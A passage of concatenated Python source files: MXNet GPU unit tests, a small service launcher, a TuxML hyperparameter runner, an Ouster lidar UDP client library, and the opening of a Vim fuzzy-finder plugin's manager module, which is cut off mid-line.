mx.cpu(0): x = x.copyto(mx.cpu(0)) states = layer.begin_state(16) co, cs = layer(x, states) assert_almost_equal(go, co, rtol=1e-2, atol=1e-6) for g, c in zip(gs, cs): assert_almost_equal(g, c, rtol=1e-2, atol=1e-6) @with_seed() @pytest.mark.serial def test_sequence_reverse(): check_sequence_reverse(mx.gpu(0)) @with_seed() @pytest.mark.serial def test_autograd_save_memory(): x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0)) x.attach_grad() with mx.autograd.record(): for i in range(200): x = x + 1 x.wait_to_read() x.backward() @with_seed() @pytest.mark.serial def test_cuda_rtc(): source = r''' extern "C" __global__ void axpy(const float *x, float *y, float alpha) { int i = threadIdx.x + blockIdx.x * blockDim.x; y[i] += alpha * x[i]; } extern "C" __global__ void saxpy(const float *x, float *y, float alpha) { extern __shared__ float smem[]; int i = threadIdx.x + blockIdx.x * blockDim.x; smem[threadIdx.x] = x[i]; y[i] += alpha * smem[threadIdx.x]; } ''' module = mx.rtc.CudaModule(source) axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha") x = mx.nd.ones((10,), ctx=mx.gpu(0)) y = mx.nd.zeros((10,), ctx=mx.gpu(0)) axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1)) assert (y.asnumpy() == 3).all() saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha") saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10) assert (y.asnumpy() == 7).all() saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5) assert (y.asnumpy() == 12).all() @with_seed() @pytest.mark.serial def test_cross_device_autograd(): x = mx.nd.random.uniform(shape=(10,)) x.attach_grad() with mx.autograd.record(): y = mx.nd.tanh(x) y = y.copyto(mx.gpu(0)) y = mx.nd.tanh(y) y = y.copyto(mx.cpu(0)) y = mx.nd.tanh(y) y = y.copyto(mx.gpu(0)) y = y.copyto(mx.gpu(0)) y.backward() dx = x.grad.copy() x.grad[:] = 0 with mx.autograd.record(): y = x for i in range(3): y = mx.nd.tanh(y) y.backward() assert_almost_equal(dx, x.grad) @with_seed() @pytest.mark.serial def test_multi_proposal_op(): # paramters feature_stride = 16 scales = (8, 16, 32) ratios = (0.5, 1, 2) rpn_pre_nms_top_n = 12000 rpn_post_nms_top_n = 2000 rpn_min_size = feature_stride feat_len = (1000 + 15) // 16 H, W = feat_len, feat_len num_anchors = len(scales) * len(ratios) count_anchors = H * W * num_anchors def get_new_data(batch_size, ctx): ''' cls_prob: (batch_size, 2 * num_anchors, H, W) bbox_pred: (batch_size, 4 * num_anchors, H, W) im_info: (batch_size, 3) ''' dtype = np.float32 cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx) bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx) im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx) cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)] np.random.shuffle(cls) cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape) bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx) for i in range(batch_size): im_size = np.random.randint(600, feat_len * feature_stride, size = (2,)) im_scale = np.random.randint(80, 100) / 100.0 im_info[i, :] = [im_size[0], im_size[1], im_scale] return cls_prob, bbox_pred, im_info def check_proposal_consistency(op, batch_size, with_nms=False): ''' op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal ''' cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0)) rois_cpu, score_cpu = op( cls_prob = cls_prob, bbox_pred = bbox_pred, im_info = im_info, feature_stride = feature_stride, scales = scales, ratios = ratios, rpn_pre_nms_top_n = rpn_pre_nms_top_n, rpn_post_nms_top_n = rpn_post_nms_top_n, threshold = 0.7 if with_nms else 1.0, rpn_min_size = rpn_min_size, output_score = True) gpu_ctx = mx.gpu(0) # copy data to gpu from cpu cls_prob_gpu = cls_prob.as_in_context(gpu_ctx) bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx) im_info_gpu = im_info.as_in_context(gpu_ctx) rois_gpu, score_gpu = op( cls_prob = cls_prob_gpu, bbox_pred = bbox_pred_gpu, im_info = im_info_gpu, feature_stride = feature_stride, scales = scales, ratios = ratios, rpn_pre_nms_top_n = rpn_pre_nms_top_n, rpn_post_nms_top_n = rpn_post_nms_top_n, threshold = 0.7 if with_nms else 1.0, rpn_min_size = rpn_min_size, output_score = True) rois_cpu_np = rois_cpu.asnumpy() rois_gpu_np = rois_gpu.asnumpy() score_cpu_np = score_cpu.asnumpy() score_gpu_np = score_gpu.asnumpy() if not with_nms: assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3) assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3) else: # no 100% gurantee with nms assert(np.sum(np.abs(score_cpu_np - score_gpu_np) < 1e-3) >= 10) assert(np.sum(np.abs(rois_cpu_np - rois_gpu_np) < 1e-3) >= 40) check_proposal_consistency(mx.nd.contrib.Proposal, 1) check_proposal_consistency(mx.nd.contrib.MultiProposal, 5) check_proposal_consistency(mx.nd.contrib.Proposal, 1, with_nms=True) check_proposal_consistency(mx.nd.contrib.MultiProposal, 5, with_nms=True) # The following 2 functions launch 0-thread kernels, an error that should be caught and signaled. def kernel_error_check_imperative(): with environment('MXNET_ENGINE_TYPE', 'NaiveEngine'): with mx.np_shape(active=True): a = mx.nd.array([1,2,3],ctx=mx.gpu(0)) b = mx.nd.array([],ctx=mx.gpu(0)) c = (a / b).asnumpy() def kernel_error_check_symbolic(): with environment('MXNET_ENGINE_TYPE', 'NaiveEngine'): with mx.np_shape(active=True): a = mx.sym.Variable('a') b = mx.sym.Variable('b') c = a / b f = c.bind(mx.gpu(0), {'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)), 'b':mx.nd.array([],ctx=mx.gpu(0))}) f.forward() g = f.outputs[0].asnumpy() @pytest.mark.serial def test_kernel_error_checking(): # Running tests that may throw exceptions out of worker threads will stop CI testing # if not run in a separate process (with its own address space for CUDA compatibility). try: mpctx = mp.get_context('spawn') except: print('SKIP: python%s.%s lacks the required process fork-exec support ... ' % sys.version_info[0:2], file=sys.stderr, end='') else: with discard_stderr(): for f in [kernel_error_check_imperative, kernel_error_check_symbolic]: p = mpctx.Process(target=f) p.start() p.join() assert p.exitcode != 0,\ "Expected a synchronous kernel error from %s(), none seen." % f.__name__ def test_incorrect_gpu(): # Try setting dev_id to a really big number pytest.raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001)) @with_seed() def test_batchnorm_backwards_notrain(): for ctx in [mx.cpu(0), mx.gpu(0)]: for cudnn_o in [False, True]: B,C,H,W = 4,3,2,2 x = mx.nd.random.poisson(1,shape=(B,C,H,W)).as_in_context(ctx) gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx) beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx) mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx) std = mx.nd.random.normal(shape=(C)).as_in_context(ctx) x.attach_grad() with autograd.record(False): y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(), fix_gamma=False, cudnn_off=cudnn_o) loss=y.square().sum() loss.backward(train_mode=False) @with_seed() def test_create_sparse_ndarray_gpu_to_cpu(): dim0 = 10 dim1 = 5 densities = [0, 0.5, 1] for density in densities: shape = rand_shape_2d(dim0, dim1) matrix = rand_ndarray(shape, 'row_sparse', density) data = matrix.data indices = matrix.indices rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu()) assert rsp_created.stype == 'row_sparse' assert same(rsp_created.data.asnumpy(), data.asnumpy()) assert same(rsp_created.indices.asnumpy(), indices.asnumpy()) rsp_copy = mx.nd.array(rsp_created) assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy())) @with_seed() def test_softmax_activation(): gpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.], [2., -.4, 7., 3., 0.2]], ctx=mx.gpu(0)) cpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.], [2., -.4, 7., 3., 0.2]], ctx=mx.cpu()) cpu_a.attach_grad() gpu_a.attach_grad() with mx.autograd.record(): gpu_y = mx.nd.SoftmaxActivation(data = gpu_a) cpu_y = mx.nd.SoftmaxActivation(data = cpu_a) assert_almost_equal(cpu_y, gpu_y, atol = 1e-3, rtol = 1e-3) gpu_y.backward() cpu_y.backward() assert_almost_equal(cpu_a.grad, gpu_a.grad, atol = 1e-3, rtol = 1e-3) @with_seed() @pytest.mark.serial @pytest.mark.serial def test_bilinear_sampler_versions(): data = mx.sym.Variable('data') grid = mx.sym.Variable('grid') sym1 = mx.sym.BilinearSampler(data=data, grid=grid) sym2 = mx.sym.BilinearSampler(data=data, grid=grid, cudnn_off=True) sym3 = mx.sym.BilinearSampler(data=data, grid=grid) test_cases = [[(1,3,15,16),(1,2,10,10)], [(1,6,7,16),(1,2,10,4)], [(1,7,3,16),(1,2,8,11)], [(1,9,50,50),(1,2,50,50)]] for item in test_cases: data_shape, grid_shape = item # kWriteTo exe_cpu = sym1._simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='write') exe_gpu = sym2._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write') exe_cudnn = sym3._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write') exe_list = [exe_cpu, exe_gpu, exe_cudnn] ref_idx = 0 test_data = np.random.uniform(low=-0.1, high=0.1,size=data_shape).astype(np.float32) test_grid = np.random.uniform(low=-2, high=2, size=grid_shape).astype(np.float32) for exe in exe_list: exe.arg_dict['data'][:] = test_data exe.arg_dict['grid'][:] = test_grid exe.forward(is_train=True) mx.test_utils.assert_almost_equal(exe_list[ref_idx].outputs[0], exe.outputs[0], rtol=1e-3, atol=1e-5) out_grad = np.random.uniform(low=-0.01, high=0.01,size=data_shape[:2] + grid_shape[2:]).astype(np.float32) for exe in exe_list: exe.backward(mx.nd.array(out_grad)) assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5) assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5) data_grad = exe_list[ref_idx].grad_dict['data'].asnumpy() grid_grad = exe_list[ref_idx].grad_dict['grid'].asnumpy() # kAddTo exe_cpu_addto = sym1._simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='add') exe_gpu_addto = sym2._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add') exe_cudnn_addto = sym3._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add') exe_list = [exe_cpu_addto, exe_gpu_addto, exe_cudnn_addto] data_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['data'].shape).astype(np.float32) grid_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['grid'].shape).astype(np.float32) for exe in exe_list: exe.arg_dict['data'][:] = test_data exe.arg_dict['grid'][:] = test_grid exe.grad_dict['data'][:] = data_initial_grad exe.grad_dict['grid'][:] = grid_initial_grad exe.forward(is_train=True) exe.backward(mx.nd.array(out_grad)) assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5) assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5) assert_almost_equal(exe_list[ref_idx].grad_dict['data'], data_grad + data_initial_grad, rtol=1e-3, atol=1e-5) assert_almost_equal(exe_list[ref_idx].grad_dict['grid'], grid_grad + grid_initial_grad, rtol=1e-3, atol=1e-5) for req_dict in [{'data' : 'null', 'grid' : 'write'}, {'data' : 'write', 'grid' : 'null'}]: # Mixture of kWriteTo and kNullOp exe_cpu_mix = sym1._simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req=req_dict) exe_gpu_mix = sym2._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict) exe_cudnn_mix = sym3._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict) exe_list = [exe_cpu_mix, exe_gpu_mix, exe_cudnn_mix] for exe in exe_list: exe.arg_dict['data'][:] = test_data exe.arg_dict['grid'][:] = test_grid exe.forward(is_train=True) exe.backward(mx.nd.array(out_grad)) if req_dict['data'] is 'write': assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5) if req_dict['grid'] is 'write': assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5) # isolated execution bulking test function to be invoked with different env var settings def _test_bulking_in_process(seed, time_per_iteration): data_shape = (10,) num_ops = 1000 num_iterations = 20 ctx = default_context() # build symbol X = mx.sym.Variable('X') sym = mx.sym.flip(X, axis=0) for _ in range(num_ops-1): sym = mx.sym.flip(sym, axis=0) x = mx.ndarray.zeros(data_shape) dx = mx.ndarray.zeros(data_shape) dy = mx.ndarray.ones(data_shape) exe = sym._bind(ctx=ctx, args=[x], args_grad = {'X':dx}) # time a number of forward() and backward() executions after some warm-up iterations warmups = 1 for i in range(num_iterations+warmups): if i == warmups: start = time.time() exe.forward(is_train=True) exe.backward(dy) dx.wait_to_read() time_per_iteration.value = (time.time() - start) / num_iterations @with_seed() @pytest.mark.skip(reason='skippping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/16517') def test_bulking_operator_gpu(): _test_bulking(_test_bulking_in_process) @pytest.mark.skip(reason='skippping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/14970') def test_bulking(): # test case format: (max_fwd_segment_size, max_bwd_segment_size, enable_bulking_in_training) test_cases = [(0,0,True), (1,1,True), (15,15,False), (15,0,True), (0,15,True), (15,15,True)] times = {} times_str = '' for seg_sizes in test_cases: # Create shared variable to return measured time from test process time_per_iteration = mp.Manager().Value('d', 0.0) if not run_in_spawned_process(_test_bulking_in_process, {'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_FWD' : str(seg_sizes[0]), 'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_BWD' : str(seg_sizes[1]), 'MXNET_EXEC_BULK_EXEC_TRAIN' : str(seg_sizes[2])}, time_per_iteration): # skip test since the python version can't run it properly. Warning msg was logged. return times[seg_sizes] = time_per_iteration.value times_str += \ '\n runtime of (fwd,bwd,enable) op seg setting ({},{},{}) =\t{:.1f} msec'.format( seg_sizes[0], seg_sizes[1], seg_sizes[2], 1000.0 * times[seg_sizes]) fastest_non_bulked_time = min(times[(0,0,True)], times[(1,1,True)], times[(15,15,False)]) slowest_half_bulked_time = max(times[(0,15,True)], times[(15,0,True)]) fastest_half_bulked_time = min(times[(0,15,True)], times[(15,0,True)]) fully_bulked_time = times[(15,15,True)] print(times_str) # Non-bulked times[0,0,True], times[1,1,True] and times[15,15,False] should be about the same, # slower than both half-bulked times[0,15,True] and times[15,0,True] assert slowest_half_bulked_time < fastest_non_bulked_time, \ 'A half-bulked exec time is slower than the non-bulked time by {} secs! {}' \ .format(slowest_half_bulked_time - fastest_non_bulked_time, times_str) # The fully bulked times[15,15,True] should be faster than both half-bulked runs assert fully_bulked_time < fastest_half_bulked_time, \ 'The fully-bulked exec time is slower than a half-bulked time by {} secs! {}' \ .format(fully_bulked_time - fastest_half_bulked_time, times_str) @with_seed() @pytest.mark.serial def test_allclose_function_gpu(): allclose_function([mx.cpu(), mx.gpu(0)]) def test_context_num_gpus(): # Test that num_gpus reports at least one GPU, as the test is run on a GPU host. assert mx.context.num_gpus() > 0 def math_log(shape, dtype, check_value): np_x = np.random.rand(*tuple(shape)) x = mx.nd.array(np_x, dtype=dtype) y = mx.nd.log(data=x) if check_value: x_ = x.as_in_context(mx.cpu()) y_ = mx.nd.log(data=x_) assert_almost_equal(y.asnumpy(), y_.asnumpy()) def math_erf(shape, dtype, check_value): np_x = np.random.rand(*tuple(shape)) x = mx.nd.array(np_x, dtype=dtype) y = mx.nd.erf(data=x) if check_value: x_ = x.as_in_context(mx.cpu()) y_ = mx.nd.erf(data=x_) assert_almost_equal(y.asnumpy(), y_.asnumpy()) def math_square(shape, dtype, check_value): np_x = np.random.rand(*tuple(shape)) x = mx.nd.array(np_x, dtype=dtype) y = mx.nd.square(data=x) if check_value: x_ = x.as_in_context(mx.cpu()) y_ = mx.nd.square(data=x_) assert_almost_equal(y.asnumpy(), y_.asnumpy()) def run_math(op, shape, dtype="float32", check_value=True): run_num = 10 for i in range(run_num): if op == 'log': math_log(shape=shape, dtype=dtype, check_value=check_value) elif op == 'erf': math_erf(shape=shape, dtype=dtype, check_value=check_value) elif op == 'square': math_square(shape=shape, dtype=dtype, check_value=check_value) @with_seed() @pytest.mark.serial def test_math(): ops = ['log', 'erf', 'square'] check_value= True shape_lst = [[1000], [100,1000], [10,100,100], [10,100,100,100]] dtypes = ["float32", "float64"] for shape in shape_lst: for dtype in dtypes: for op in ops: run_math(op, shape, dtype, check_value=check_value) @with_seed() @pytest.mark.serial def test_arange_like_dtype(): dtypes = [np.float16, np.float32, np.float64] for t in dtypes: x = mx.sym.Variable('x', dtype=t) y = mx.sym.reshape(x, shape=(0, 0, -1)) z = mx.sym.contrib.arange_like(y, axis=-1) mod = z._simple_bind(ctx=mx.gpu(0), x=(3, 4, 5, 6), grad_req='null') mod.arg_arrays[0][:] = np.random.normal(size=mod.arg_arrays[0].shape).astype(t) out = mod.forward(is_train=False) for v in out: assert v.dtype == t
run.py
""" This is the main script that starts everything. """ from multiprocessing import Process import time import uvicorn from modules.worker.main import Worker from settings import DATASTORE_APP_ADDRESS def run_worker_app_process(): """ start the worker application as a process """ worker_app_proc = Process(target=Worker) worker_app_proc.start() return worker_app_proc def run_storage_app(address, port): """ start the storage application with uvicorn """ uvicorn.run("modules.datastore.main:app", host=address, port=port, log_level="debug") # TODO critical log level in production maybe def run_storage_app_process(address, port): """ run storage app as a process """ storage_app_proc = Process(target=run_storage_app, args=(address, port)) storage_app_proc.start() return storage_app_proc if __name__ == "__main__": run_storage_app_process(*DATASTORE_APP_ADDRESS) run_worker_app_process() while True: time.sleep(10)
index.py
from load_dataset import load_dataset from params import get_params, get_possible_configurations import traceback, os import tux from threading import Thread,BoundedSemaphore params, hyperparams_list = get_params() configs = get_possible_configurations(hyperparams_list) df = load_dataset(params["nb_yes"]) params["dataset"] = df params["semaphore"] = None if not params["algo"] == "rf" : limit = os.sysconf('SC_NPROCESSORS_ONLN') if "n_jobs" in params["hyperparams"]: limit = params["hyperparams"]["n_jobs"] del(params["hyperparams"]["n_jobs"]) params["semaphore"] = BoundedSemaphore(limit) list_ml = [] if len(configs) > 0: for config in configs: for k,v in config.items(): params["hyperparams"][k] = v try: ml = tux.TuxML(**params) except Exception as e: print(traceback.format_exc()) print(e) if params["semaphore"] is None: try: ml.start() except Exception as e: print(traceback.format_exc()) print(e) print("Fails") else: list_ml.append(Thread(target=ml.start)) for i in list_ml: i.start() for i in list_ml: i.join() else: print("Starting") try: ml = tux.TuxML(**params) except Exception as e: print(traceback.format_exc()) print(e) try: ml.start() except Exception as e: print(traceback.format_exc()) print(e) print("Fails") print("End")
core.py
"""Ouster sensor Python client. This module contains more idiomatic wrappers around the lower-level module generated using pybind11. """ from contextlib import closing from more_itertools import take from typing import cast, Iterable, Iterator, List, Optional, Tuple from typing_extensions import Protocol from threading import Thread import time from . import _client from . import (ColHeader, SensorInfo, ImuPacket, LidarPacket, LidarScan, Packet) class ClientError(Exception): """Base class for client errors.""" pass class ClientTimeout(ClientError): """Raised when data does not arrive within the expected time.""" pass class ClientOverflow(ClientError): """Raised when data loss is possible due to internal buffers filling up.""" pass class PacketSource(Protocol): """Represents a single-sensor data stream.""" def __iter__(self) -> Iterator[Packet]: """A PacketSource supports ``Iterable[Packet]``. Currently defined explicitly due to: https://github.com/python/typing/issues/561 """ ... @property def metadata(self) -> SensorInfo: """Metadata associated with the packet stream.""" ... def close(self) -> None: """Release the underlying resource, if any.""" ... class Packets(PacketSource): """Create a :class:`PacketSource` from an existing iterator.""" _it: Iterator[Packet] _metadata: SensorInfo def __init__(self, it: Iterable[Packet], metadata: SensorInfo): """ Args: it: A stream of packets metadata: Metadata for the packet stream """ self._it = iter(it) self._metadata = metadata @property def metadata(self) -> SensorInfo: return self._metadata def __iter__(self) -> Iterator[Packet]: """Return the underlying iterator.""" return self._it def close(self) -> None: pass class Sensor(PacketSource): """A packet source listening on local UDP ports. Uses a separate thread that fills internal buffers without holding the GIL. Note: Make sure ``close()`` will be called on all instances before Python attempts to exit, or the interpreter will hang waiting to join the thread (like any other non-daemonized Python thread). """ _cli: _client.Client _timeout: Optional[float] _metadata: SensorInfo _pf: _client.PacketFormat _producer: Thread _cache: Optional[Tuple[_client.ClientState, bytearray]] def __init__(self, hostname: str = "localhost", lidar_port: int = 7502, imu_port: int = 7503, *, metadata: Optional[SensorInfo] = None, buf_size: int = 128, timeout: Optional[float] = 1.0, _overflow_err: bool = False, _flush_before_read: bool = True) -> None: """ Neither the ports nor udp destination configuration on the sensor will be updated. The metadata will be fetched over the network from the sensor unless explicitly provided using the ``metadata`` parameter. Args: hostname: hostname of the sensor lidar_port: UDP port to listen on for lidar data imu_port: UDP port to listen on for imu data metadata: explicitly provide metadata for the stream buf_size: number of packets to buffer before dropping data timeout: seconds to wait for packets before signaling error or None _overflow_err: if True, raise ClientOverflow _flush_before_read: if True, try to clear buffers before reading Raises: ClientError: If initializing the client fails. """ self._cli = _client.Client(hostname, lidar_port, imu_port, buf_size) self._timeout = timeout self._overflow_err = _overflow_err self._flush_before_read = _flush_before_read self._cache = None self._fetched_meta = "" # Fetch from sensor if not explicitly provided if metadata: self._metadata = metadata else: self._fetch_metadata() self._metadata = SensorInfo(self._fetched_meta) self._pf = _client.PacketFormat.from_info(self._metadata) # Use args to avoid capturing self causing circular reference self._producer = Thread(target=lambda cli, pf: cli.produce(pf), args=(self._cli, self._pf)) self._producer.start() def _fetch_metadata(self) -> None: if not self._fetched_meta: self._fetched_meta = self._cli.get_metadata() if not self._fetched_meta: raise ClientError("Failed to collect metadata") def write_metadata(self, path: str) -> None: """Save metadata to disk. Args: path: path to write """ self._fetch_metadata() with open(path, 'w') as f: f.write(self._fetched_meta) @property def metadata(self) -> SensorInfo: return self._metadata def _next_packet(self) -> Optional[Packet]: if self._cache is None: # Lidar packets are bigger than IMU: wastes some space but is simple buf = bytearray(self._pf.lidar_packet_size) st = self._cli.consume(buf, self._timeout or 0) else: st, buf = self._cache self._cache = None if self._overflow_err and st & _client.ClientState.OVERFLOW: raise ClientOverflow() if st & _client.ClientState.LIDAR_DATA: return LidarPacket(buf, self._metadata) elif st & _client.ClientState.IMU_DATA: return ImuPacket(buf, self._metadata) elif st == _client.ClientState.TIMEOUT: raise ClientTimeout(f"No packets received within {self._timeout}s") elif st & _client.ClientState.ERROR: raise ClientError("Client returned ERROR state") elif st & _client.ClientState.EXIT: return None raise AssertionError("Should be unreachable") def _peek(self) -> Tuple[_client.ClientState, bytearray]: if self._cache is None: # Lidar packets are bigger than IMU: wastes some space but is simple buf = bytearray(self._pf.lidar_packet_size) st = self._cli.consume(buf, self._timeout or 0) self._cache = (st, buf) return self._cache def __iter__(self) -> Iterator[Packet]: """Access the UDP data stream as an iterator. Reading may block waiting for network data for up to the specified timeout. Failing to consume this iterator faster than the data rate of the sensor may cause packets to be dropped. Raises: ClientTimeout: If no packets are received within the configured timeout. ClientError: If the client enters an unspecified error state. """ # Attempt to flush any old data before producing packets if self._flush_before_read: self.flush(full=True) while True: p = self._next_packet() if p is not None: yield p else: return def flush(self, n_frames: int = 3, *, full=False) -> int: """Drop some data to clear internal buffers. Args: n_frames: number of frames to drop full: clear internal buffers first, so data is read from the OS receive buffers (or the network) directly Raises: ClientTimeout: if a lidar packet is not received within the configured timeout. """ if full: self._cli.flush() last_frame = -1 n_dropped = 0 last_ts = time.monotonic() while True: st, buf = self._peek() if st & _client.ClientState.LIDAR_DATA: frame = LidarPacket(buf, self._metadata).header( ColHeader.FRAME_ID)[0] if frame != last_frame: last_frame = frame n_frames -= 1 if n_frames < 0: break last_ts = time.monotonic() if self._timeout is not None and (time.monotonic() >= last_ts + self._timeout): raise ClientTimeout( f"No packets received within {self._timeout}s") # call for effect and drop packet try: if self._next_packet() is None: break except ClientOverflow: pass n_dropped += 1 return n_dropped def buf_use(self) -> int: return self._cli.size def close(self) -> None: """Shut down producer thread and close network connection. Attributes may be unset if constructor throws an exception. """ if hasattr(self, '_cli'): self._cli.shutdown() if hasattr(self, '_producer'): self._producer.join() def __del__(self) -> None: self.close() class Scans: """An iterable stream of scans batched from a PacketSource. Batching will emit a scan every time the frame_id increments (i.e. on receiving first packet in the next scan). Reordered packets will be handled, except across frame boundaries: packets from the previous scan will be dropped. Optionally filters out incomplete frames and enforces a timeout. A batching timeout can be useful to detect when we're only receiving incomplete frames or only imu packets. Can also be configured to manage internal buffers for soft real-time applications. """ def __init__(self, source: PacketSource, *, complete: bool = False, timeout: Optional[float] = None, _max_latency: int = 0) -> None: """ Args: source: any source of packets complete: if True, only return full scans timeout: seconds to wait for a scan before error or None _max_latency: (experimental) approximate max number of frames to buffer """ self._source = source self._complete = complete self._timeout = timeout self._max_latency = _max_latency def __iter__(self) -> Iterator[LidarScan]: """Get an iterator.""" w = self._source.metadata.format.columns_per_frame h = self._source.metadata.format.pixels_per_column packets_per_frame = w // self._source.metadata.format.columns_per_packet column_window = self._source.metadata.format.column_window # If source is a sensor, make a type-specialized reference available sensor = cast(Sensor, self._source) if isinstance( self._source, Sensor) else None ls_write = _client.LidarScan(w, h) pf = _client.PacketFormat.from_info(self._source.metadata) batch = _client.ScanBatcher(w, pf) # Time from which to measure timeout start_ts = time.monotonic() it = iter(self._source) while True: try: packet = next(it) except StopIteration: return if self._timeout is not None and (time.monotonic() >= start_ts + self._timeout): raise ClientTimeout(f"No lidar scans within {self._timeout}s") if isinstance(packet, LidarPacket): if batch(packet._data, ls_write): # Got a new frame, return it and start another ls = LidarScan.from_native(ls_write) if not self._complete or ls._complete(column_window): yield ls start_ts = time.monotonic() ls_write = _client.LidarScan(w, h) # Drop data along frame boundaries to maintain _max_latency and # clear out already-batched first packet of next frame if self._max_latency and sensor is not None: buf_frames = sensor.buf_use() // packets_per_frame drop_frames = buf_frames - self._max_latency + 1 if drop_frames > 0: sensor.flush(drop_frames) batch = _client.ScanBatcher(w, pf) def close(self) -> None: """Close the underlying PacketSource.""" self._source.close() @property def metadata(self) -> SensorInfo: """Return metadata from the underlying PacketSource.""" return self._source.metadata @classmethod def sample( cls, hostname: str = "localhost", n: int = 1, lidar_port: int = 7502, *, metadata: Optional[SensorInfo] = None ) -> Tuple[SensorInfo, Iterator[List[LidarScan]]]: """Conveniently sample n consecutive scans from a sensor. Does not leave UDP ports open. Suitable for interactive use. Args: hostname: hostname of the sensor n: number of consecutive frames in each sample lidar_port: UDP port to listen on for lidar data metadata: explicitly provide metadata for the stream Returns: A tuple of metadata queried from the sensor and an iterator that samples n consecutive scans """ with closing(Sensor(hostname, metadata=metadata)) as sensor: metadata = sensor.metadata def next_batch() -> List[LidarScan]: with closing( Sensor(hostname, lidar_port, metadata=metadata, buf_size=n * 128, _flush_before_read=False)) as source: source.flush(full=True) scans = cls(source, timeout=1.0, complete=True, _max_latency=0) return take(n, scans) return metadata, iter(next_batch, []) @classmethod def stream(cls, hostname: str = "localhost", lidar_port: int = 7502, *, buf_size: int = 640, timeout: float = 1.0, complete: bool = True, metadata: Optional[SensorInfo] = None) -> 'Scans': """Stream scans from a sensor. Will drop frames preemptively to avoid filling up internal buffers and to avoid returning frames older than the scanning period of the sensor. Args: hostname: hostname of the sensor lidar_port: UDP port to listen on for lidar data timeout: seconds to wait for scans before signaling error complete: if True, only return full scans metadata: explicitly provide metadata for the stream """ source = Sensor(hostname, lidar_port, metadata=metadata, buf_size=buf_size, timeout=timeout, _flush_before_read=True) return cls(source, timeout=timeout, complete=complete, _max_latency=1)
manager.py
#!/usr/bin/env python # -*- coding: utf-8 -*- import vim import os import sys import time import operator import itertools import threading import multiprocessing from functools import partial from functools import wraps from .instance import LfInstance from .cli import LfCli from .utils import * from .fuzzyMatch import FuzzyMatch from .asyncExecutor import AsyncExecutor is_fuzzyEngine_C = False try: import fuzzyEngine is_fuzzyEngine_C = True cpu_count = multiprocessing.cpu_count() lfCmd("let g:Lf_fuzzyEngine_C = 1") except ImportError: lfCmd("let g:Lf_fuzzyEngine_C = 0") is_fuzzyMatch_C = False try: import fuzzyMatchC is_fuzzyMatch_C = True lfCmd("let g:Lf_fuzzyMatch_C = 1") except ImportError: lfCmd("let g:Lf_fuzzyMatch_C = 0") if sys.version_info >= (3, 0): def isAscii(str): try: str.encode("ascii") return True except UnicodeEncodeError: return False else: def isAscii(str): try: str.decode("ascii") return True except UnicodeDecodeError: return False def modifiableController(func): @wraps(func) def deco(self, *args, **kwargs): if self._getExplorer().getStlCategory() in ("Search_History", "Cmd_History"): return func(self, *args, **kwargs) self._getInstance().buffer.options['modifiable'] = True func(self, *args, **kwargs) self._getInstance().buffer.options['modifiable'] = False return deco #***************************************************** # Manager #***************************************************** class Manager(object): def __init__(self): self._autochdir = 0 self._instance = None self._cli = LfCli() self._explorer = None self._content = [] self._index = 0 self._help_length = 0 self._show_help = False self._selections = {} self._highlight_pos = [] self._highlight_pos_list = [] self._highlight_refine_pos = [] self._highlight_ids = 